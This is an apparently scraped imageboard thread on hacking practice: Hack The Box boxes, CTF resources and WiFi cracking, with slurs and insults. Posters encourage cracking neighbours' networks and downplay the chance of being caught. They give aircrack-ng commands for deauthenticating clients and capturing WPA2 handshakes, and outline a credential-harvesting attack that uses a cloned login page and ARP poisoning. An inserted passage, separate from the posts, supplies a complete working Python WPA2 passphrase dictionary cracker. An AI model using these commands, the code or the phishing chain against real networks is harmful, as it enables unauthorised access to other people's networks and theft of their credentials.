PREVIOUS THREAD HERE I'll try to stay as active as possible in these threads; yeah, they don't get much attention, but a lot of the posts are interesting and people seem to actually discuss the topics.
Pic related is a huge list of things you can practice on, graciously stolen from
Yeah, the two can be linked, but I've found that /cyb/+/sec/ typically focuses more on cyberpunk culture as such; from lurking /hmg/ for ages I've found that this thread gets more technical content and focused people wanting to learn. Just my two cents though.
Jack Bailey
Alright. Thanks for letting me know. I'll see what I can contribute
Sebastian Watson
>Is this associated with /sec/+/cyb/ by chance? It most certainly is NOT. That clusterfuck of a thread is why the Comptia disclaimer was put in the pasta. Every fucking mouth breather from over there waddled in asking about how they are going to get from sec+ to being like mudge.
Jeremiah Wilson
>mudge lol as if most of those larping zoomers even know who that is
Gabriel Cox
Just completed HTB Jerry. I know it's one of the simplest, but hey, it's a start. Metasploit was unable to start a meterpreter shell after payload upload, but I figured that out (LHOST related). Onto the next one I guess.
What's a good starting box for beginners? I'm just getting started into CTFs and pentests and I would like to learn more
Aaron Ross
Jerry is the easiest box, I rooted it in under 10 minutes.
Jonathan Green
Nice.
Hudson Hall
What about retired boxes? I like to see how far I can go before having to look up what I have to do
Joshua Green
This course (lectures are open) and book teach you x86 Assembly and C, plus things like Return-Oriented Programming (ROP), which is what they used for those Spectre attacks recently. cs.cmu.edu/~213/schedule.html
After that you can try Radare2 to start reverse engineering shit. See the end of this post for ARM exploitation: azeria-labs.com/the-importance-of-deep-work-the-30-hour-method-for-learning-a-new-skill/ Personally I don't do many challenges or exercises, I just go get bounties on HackerOne and Bugcrowd sites. Otherwise there's the book The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws, 2nd Edition, which is learn by doing: you get Burp Suite up and running and then 'do' the book, you don't read it.
Alexander Butler
Do you have any other bug crowd sites?
Alexander Hill
Here's a big review of the ones I've done (as far as I recall). These are in the order I did them.
>Blue, famous exploit. Easy.
>Mirai, easy user, easy but overthinkable root.
>Blocky, I don't recall but I think it was easy.
>Nibbles, user is easy but needs guess work.
>Shocker, REALLY EASY, uses a now classic exploit.
>Bashed, also easy as fuck but it gave me experience with a nice tool.
>Solidstate, I think this one involved breaking out of a simple "jail" shell.
>Lame, don't recall.
>Legacy, also don't recall.
>Sense, BSD so it was a little tricky for me.
>Chatterbox, sucked massive dicks when it was new and getting hammered.
>Valentine, another famous exploit, don't over think it.
>Devel, I don't recall.
>Popcorn, another one I CBA.
>Mantis, one of the hardest boxes I've done.
>Jeeves, annoying but workable.
>Node, fun, took me a bit to get through all the users to root.
>Beep, CBA.
>Celestial, really fucking simple deserialization attack.
>Poison, another one everyone over thought.
>Aragog, took me WAY too long to go from user to root.
>Sunday, was super easy when many people were whacking at it.
>Olympus, very very CTF like but it was fun, the final priv esc is a good technique to learn.
>Jerry, easiest box since Mirai.
>Active, one of the most real-world boxes I've done.
>Silo, yikes, this box kicked my ass until the week it was retired.
Here's my videos if you hit a wall on some of those.
Whoa nice. Have you done the newest retired box yet? I usually watch IppSec, but if you are going to be uploading retired boxes I might watch that. I guess I'll try Blue now. Wish me luck! Any useful advice for doing most of the boxes?
Chase Jenkins
Yeah, that was Celestial I just didn't video it.
My biggest advice is to work the problems as they come, and read and digest any errors you get. Also keep good notes; that is my biggest downfall.
Austin Evans
When, if you are, is the Celestial video coming out? Also, I usually keep notes on txt files. Should I put that on my real computer or my virtual machine?
Ian Cooper
How do I get the password for the airbnb I'm at. Niggers wouldn't share it.
Gavin Brown
Scan the network for other devices and steal one of their mac addresses. Ezpz.
Isaac Garcia
What's the command on terminal for scan? Or do you have to download another app?
Once you get the MAC address, then what do you do?
Jordan Hughes
>Just completed HTB Jerry Are you the dude I was talking to last thread? And I said do Jerry, Poison and Celestial?
Except Celestial has been bounced, shame.
Good work on getting Jerry. It's a bastard of a box because you never think it's that simple.
Daniel Sanders
how in2 haxoring the android ?
Joseph Clark
>Is it broken or am I not understanding the meme? Yeah, it's broken now. It used to direct straight to that book, but after reading it from end to end, I've determined it's bullshit; a literal fantasy novel written by someone who wants to play hacker.
One chapter had the author talk about how he climbed over a military base fence, only to have the guards pull rifles on him when he landed on the other side.
During the time he was sent to some office, he managed to plant a bug in one of the airgapped machines. Literal, fucking, fantasy.
Landon Jenkins
Good thing I didn't waste time on that shit then. Thanks.
Zachary Russell
>Active, One of the most real-world boxes I've done. Oi you.
I need a hand. I've got the user password, by running it through gpp-decrypt.
pth-winexe and crackmapexec are giving me logon errors.
The forums say that a shell is not required, so I'm guessing mimikatz isn't needed.
Where to go from here?
Kevin Reed
>then what do you do? Not be a fucking scrub that’s what.
Joseph Sanchez
Great answer
Caleb Davis
Why don’t you ask an actual question
Andrew Cook
How's it going /hmg/? I'm breaking into this book tonight - finally got myself off WoW long enough to get into it. It's quite motivating that while I'm a pentesting noob, all the shit around it like using Linux and programming I already have down. What are all the other newb hackermen doing to learn? repo.zenk-security.com/Magazine E-book/Penetration Testing - A hands-on introduction to Hacking.pdf
Justin Jones
Doing the bandit challenges and watching retired hacked boxes
Juan Martinez
Those bandit challenges didn't really appeal to me, but I can see how they might be useful for learning bash. Personally I think just straight up running Linux as your main OS does the trick better. What do you mean by retired hacked boxes though?
Jason Rogers
>playing hack the box >running through as many CTF/boot2roots as I can in a month >reading the PWK book from OP links I think I am ready to take the OSCP. If I can bust 10 random, not picked or vetted at all boot2roots by the 30th of September, I’ll book it.
Samuel King
Best of luck with that user. I hope one day to be anywhere close to that level.
To be perfectly honest it probably won't work unless the password sucks. Just changing your MAC address to pretend to be the other supplicant won't work because you don't have the key that was negotiated during the 4-way handshake.
Christian Hughes
>Basically he's trying to have you do this. No I wasn’t. I was trying to get him to leave by telling him he was a scrub for asking about shit he could literally google.
Jonathan Campbell
HTB retired boxes. Watch IppSec.
Aiden Collins
skimming through that prompted me to ask - with a good password list and a GPU at my disposal, how likely do you think I am to access neighboring networks around where I live? I can't imagine residential areas having the strongest passwords. Also another question actually that might be more suited to /cybsec/, I assume there's no 'botnet' related issue with running cracking off of a desktop rather than a live USB right? I mean, unless you get raided and have forensics thrown at you, which is obviously unlikely for small time wifi cracking. Does anyone ever even get caught doing that stuff?
Levi Allen
Just here to remind you that you have no fucking clue about hacking, and you have yet to learn the difference between penetration testing and actual hacking.
These threads, as always, teach normies about normie tools.
Juan Peterson
Then why even make the first responses?
Nolan Brooks
Most of the google results are shit. I was asking for working methods and not just clickbaity articles
Samuel Morris
Oh, this is a pretty cool resource, thanks.
Please detail for us the difference between pentesting and 'actual hacking'
Levi Parker
Then what are non normie tools, or was this post just bait?
Joseph Cruz
Yeah np. It helps to lurk his videos and learn about different methods.
Michael James
People Like you are the worst. Everyone starts out as a script kiddie. No harm in that.
Chase Gomez
This. On the note of script kiddies, are there any other exploit websites like Metasploit?
Jose Kelly
In the life of a pentester how often do you find yourself writing a Python or C script?
Jace Moore
>how likely do you think I am to access neighboring networks around where I live? In all honesty I think I would just search for people still using WEP and use their AP. WEP was so bad that people speculate it was never reviewed by actual professionals. There's probably tons of scripts to let you do that. Also, you can probably find some APs that never changed their BSSID, since that could mean they're using some default password. Past that I don't think you'll get very lucky, but I haven't really tried myself.
>Also another question actually that might be more suited to /cybsec/, I assume there's no 'botnet' related issue with running cracking off of a desktop rather than a live USB right? I mean, unless you get raided and have forensics thrown at you, which is obviously unlikely for small time wifi cracking. Does anyone ever even get caught doing that stuff? I highly doubt it. Even if you crack someone's WiFi PSK all it gets you is access to their AP. If you crack someone's sent messages you can only see network/transport layer information (IP address, ports, and other bullshit you won't be interested in) if the sites they're accessing have TLS/HTTPS. At best you'll be able to see which porn sites your neighbors visit and that's with a stupid amount of time invested for cracking one session's messages if it's WPA2. So basically you're not really doing anything that damaging. So it's unlikely there's any hidden software that reports you to the cyber police. I don't really do these things so I can't tell you for sure.
Luke Gomez
Nah, just dumb people. There's a right way and a wrong way. The more you people pick the wrong way, the easier it makes black hat penetration possible. I'm not complaining, I'm just amazed.
Matthew Bennett
Is there any good software or terminal commands that help with wifi hacking? Also, realistically, how would you start a botnet?
Adam James
Yea, that makes sense. Obviously I'll be on the lookout for WEP, but I'm not so optimistic. Anyway, I'm not looking for anything interesting, I more just want to do it for the sake of doing it. It's unlikely I'll go anywhere with it if I do manage to crack something, or that I'll even know where to go.
Samuel Nelson
>implying I did
Too bad so sad. Try harder.
Carter Perry
Then why not help them find the "Right way"? Instead of just telling them to git gud.
Jayden Adams
>exploit websites like Metasploit? It’s not a website...
How do you scan for WEP networks? I'll check this out.
Aaron Wood
Fucking Google It
Jesus Christ cunt.
Kevin Moore
aircrack tools that come with kali are a good start.
Jaxon Thompson
Guys why the fuck isn't reaver or bully working? I'm done pentesting using WPA2 cracking
Lincoln Gonzalez
Look into aircrack, and if you have the money or know where to look on the web I would recommend this course pentesteracademy.com/course?id=9
The man has a bit of an accent but he knows his shit.
Ethan Brown
The whole reason to have threads is to ask questions, you retard. Do you get your jollies by camping out in threads and screeching RTFM?
Colton Gutierrez
>Is there any good software or terminal commands that help with wifi hacking? aircrack-ng is usually the way people capture traffic over the air, run attacks, and attempt to crack weak passwords. Metasploit probably has some attacks against older protocols like WEP or WPA. I don't really execute any attacks. I'm just an engineer that likes to learn how these things work and did a small paper on WiFi security. Just be sure to run these things on your own network.
>Also, realistically, how would you start a botnet? Realistically, a lot of small devices are internet enabled without any concern for security. They're basically easy targets to install malware to open a backdoor for you to control so that's probably the easiest way. The truth is, it's just plain unethical and something a shit skin would do like this dumb ass. nj.com/education/2017/12/rutgers_student_charged_in_series_of_cyber_attacks.html
More generally, people run port scans to find devices that are online. Then run any exploit to open a backdoor if the current OS, service, or firmware has any. Any port scan of the net won't go unnoticed though so some people just use sites that publish results. Maybe they'll get lucky and there's already a script out there or they'll attempt to reverse engineer the firmware. That's why I'm calling the guy above a dumb ass. He was basically just a script kiddie that thought he was being clever.
Well someone did. Either way, I'm sick of people just joining these threads to larp and call anyone that asks beginner questions an idiot. These people are just too new to understand what they're searching for, and when I see responses like that it just makes me think you have no clue how to answer them. People ask stupid questions when they're new to things. If you guide them, they'll eventually pick up the language and learn how to search for things on their own.
Jacob Thomas
Thanks guys. I’ll also check out the course
Noah Bailey
You need a USB wifi dongle that supports packet injection.
Once you get Kali going it would go something like this -
airmon-ng check kill
airmon-ng start wlan0
airodump-ng -M wlan0mon
Copy the BSSID and take note of the channel #.
airodump-ng -c [channel #] -w [location to save handshake] --bssid [BSSID] wlan0mon
aireplay-ng -0 0 -a [BSSID] wlan0mon
Stop both processes once the 4-way handshake is found.
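What the captured handshake is then used for, as an added example that is not from any poster in this thread: once airodump-ng has message 2 of the 4-way handshake, a dictionary attack (aircrack-ng, hashcat) derives the PMK from each candidate passphrase with PBKDF2, expands it with the two MACs and two nonces into the PTK, and checks whether the first 16 bytes of that PTK (the KCK) reproduce the MIC the client put on the frame. The script below does exactly that in plain Python. It also makes the point from the earlier reply about the Airbnb network concrete: cloning a connected client's MAC changes nothing, because the MIC and the traffic keys depend on the PSK and the nonces, not on the addresses alone. Everything in it is constructed for the example: the SSID "HomeNet-2G", the MACs, the nonces, the RSN IE, the wordlist and the passphrase "sunflower42" are not from a real capture. It assumes WPA2-PSK with AKM 2 (descriptor version 2, HMAC-SHA1-128 MIC); WPA3-SAE does not derive the PMK from the passphrase this way, so this check does not apply there. Run it only against handshakes from networks you are authorized to test.

```python
"""Offline WPA2-PSK handshake check, the way aircrack-ng does it (added example, constructed data)."""
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81   # the MIC field starts at byte 81 of an EAPOL-Key frame (4-byte 802.1X header + 77)
MIC_LEN = 16      # HMAC-SHA1 truncated to 128 bits for AKM 2 (WPA2-PSK)


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes       # authenticator address (AA), from the beacon / message 1
    client_mac: bytes   # supplicant address (SPA)
    anonce: bytes       # from message 1
    snonce: bytes       # from message 2
    eapol_msg2: bytes   # full EAPOL-Key frame of message 2, MIC included


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter), truncated."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_kck(pmk: bytes, hs: Handshake) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min/max of the MACs and nonces); KCK = first 16 bytes."""
    data = (min(hs.ap_mac, hs.client_mac) + max(hs.ap_mac, hs.client_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)   # KCK(16) | KEK(16) | TK(16) for CCMP
    return ptk[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL frame with its own MIC field zeroed (AKM 2: HMAC-SHA1-128)."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def passphrase_matches(hs: Handshake, passphrase: str) -> bool:
    """True iff this passphrase reproduces the MIC the client put on message 2."""
    kck = derive_kck(pmk_from_passphrase(passphrase, hs.ssid), hs)
    captured_mic = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), captured_mic)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: one PBKDF2 (4096 HMAC-SHA1 rounds) per candidate, which is why GPUs matter."""
    for candidate in wordlist:
        if passphrase_matches(hs, candidate):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP): key info 0x010a = pairwise + MIC, descriptor v2."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020c00")   # typical WPA2-CCMP RSN IE
    body = (b"\x02"                                    # descriptor type: RSN
            + struct.pack(">HH", 0x010A, 0)            # key info, key length (0 in message 2)
            + struct.pack(">Q", 1)                     # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
            + mic + struct.pack(">H", len(rsn_ie)) + rsn_ie)      # MIC, key data length, key data
    return struct.pack(">BBH", 2, 3, len(body)) + body   # 802.1X header: version 2, type 3 (EAPOL-Key)


def build_sample_capture(passphrase: str, ssid: str = "HomeNet-2G") -> Handshake:
    """Stand-in for a real capture: constructed MACs and nonces, message 2 signed with the real PSK."""
    hs = Handshake(ssid, bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd"),
                   bytes(range(32)), bytes(range(32, 64)), build_msg2(bytes(range(32, 64))))
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), hs)
    hs.eapol_msg2 = build_msg2(hs.snonce, eapol_mic(kck, hs.eapol_msg2))
    return hs


WORDLIST = ["password", "letmein", "sunflower42", "correct horse"]   # constructed wordlist


if __name__ == "__main__":
    capture = build_sample_capture("sunflower42")
    print("recovered passphrase:", crack(capture, WORDLIST))
    print("client MAC alone, no PSK:", passphrase_matches(capture, ""))
```

The expensive step is pmk_from_passphrase; the PTK expansion and the MIC are a handful of HMACs. That is also why the same wordlist against the same SSID can be precomputed (the PMK depends only on passphrase and SSID) but has to be redone for every distinct SSID, and why a default SSID is the weakest starting point.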
Thanks a lot. Any advice for port scans (that google doesn’t tell you)? Thanks and nice dubs
Gavin Morgan
What’s the best dongle for packet injection?
Levi Ward
>Do you get your jollies by camping out in threads and screeching RTFM? I really do, especially when people ask really fucking stupid question.
Austin White
alfa stuff
Ryder Torres
It's illegal in some countries. In fact, just having the software installed without some kind of license can have you fined so do your research. Run scans on your own network and know the difference between a public and private IP. If you're not careful you can end up scanning some military server that logs this stuff.
Samuel Hughes
>If you guide them, they'll eventually pick up the language and learn how search things on their own. Spoon feeding is not guiding. Look at all the questions he’s asked that clearly show he’s done zero research on anything he’s been “guided” to look at.
Jonathan Edwards
I have TL-WN722N and an alfa one both work well.
Jason Mitchell
Any recommendations for port scan software?
Sebastian Cruz
Thanks guys. Really appreciate getting feedback even though I ask really stupid questions. You guys are great
Dylan King
nmap
Cameron Davis
Do you know the specific command?
Wyatt Scott
What kind of basic knowledge should I have before I start trying boxes?
This industry is soul crushing. Save yourself and stay on the black side or you will regret it.
Juan Powell
IppSec videos. He goes through a bunch of flags I've never seen before and am very glad I learnt.
Oliver Howard
Please tell me what I spoon fed? Links to resources? Tool suggestions? Vague ideas on how these attacks work? It's easy to get overwhelmed if you don't understand what you're searching for. Like take this question as an example. Sure you can search "port scan software" and find nmap as the first result but they don't know it's any good. Hell, they're still not sure what it does. Is it really spoon feeding to just throw out a tool suggestion so they don't need to blindly sift through results they still don't fully understand yet?
Austin Price
Man what another shit thread. All because of fucking skids.
Jeremiah Lee
Yeah. Meanwhile we could have another meaningful Intel v. AMD discussion.
Jose Bennett
Cracked droopy during work today. Nice and simple, using patterns I have employed time and time again in other CTFs.
My methodology for the first half of the engagement is solid; I have a proven pathway set up that I follow and it almost always leads to a shell.
Sadly I don't have a solid, proven guide for the second half of the engagement; this seems crucial to passing. But what I did today has worked for others; it's just slow.
Anyway that’s one done.
Joseph Edwards
stop pissing around and just do the fucking test
Ayden Clark
What's the best app for Android to crack wifi passwords and do MITM attacks? I've tried reaver for cracking but I can't manage to make it work. I've also tried cSploit and zANTI but they suck.
Better off buying a laptop and using kali or metasploit.
Blake Stewart
>kali or metasploit.
>implying metasploit is an OS
>implying metasploit has any decent MITM modules
>implying metasploit has any wifi modules
>implying the one you are about to frantically reply to me about isn't a post tool for dumping PSKs saved in a box
>implying you shouldn't just crawl back to the cyb thread where you can play pretendsies some more
Just because you couldn’t get either of them working doesn’t mean they suck. You suck, is the problem.
Jaxon Flores
>being this butthurt over a completely reasonable suggestion Jesus Christ you're such a faggot
Logan Ward
I got them to work, but some features like sniffing are impossible to use due to HTTPS. The SSL stripping feature simply sucks because of the security pop-ups most browsers have.
Colton Stewart
These threads are so fucking cringey. It's no wonder they normally tag sec with cyberpunk. Larping and low IQ posts everywhere. The "let's use premade tools" mentality is a huge red flag.
Ryder Jones
Nothing about your suggestion was reasonable.
What you've got working on your phone is about as good as you're gonna get. SSL stripping really isn't that viable. Use SET, the Social-Engineer Toolkit, to mimic a page like Facebook or whatever you're trying to MITM, because I imagine it's for cred harvesting; do an ARP poison to redirect any requests on the network to your fake page, collect everything, off ya go. Even set it so when they click submit it redirects them to the real page so no one gets too suss.
Aiden Cox
everyone knows you're just making multiple posts from the ip count, user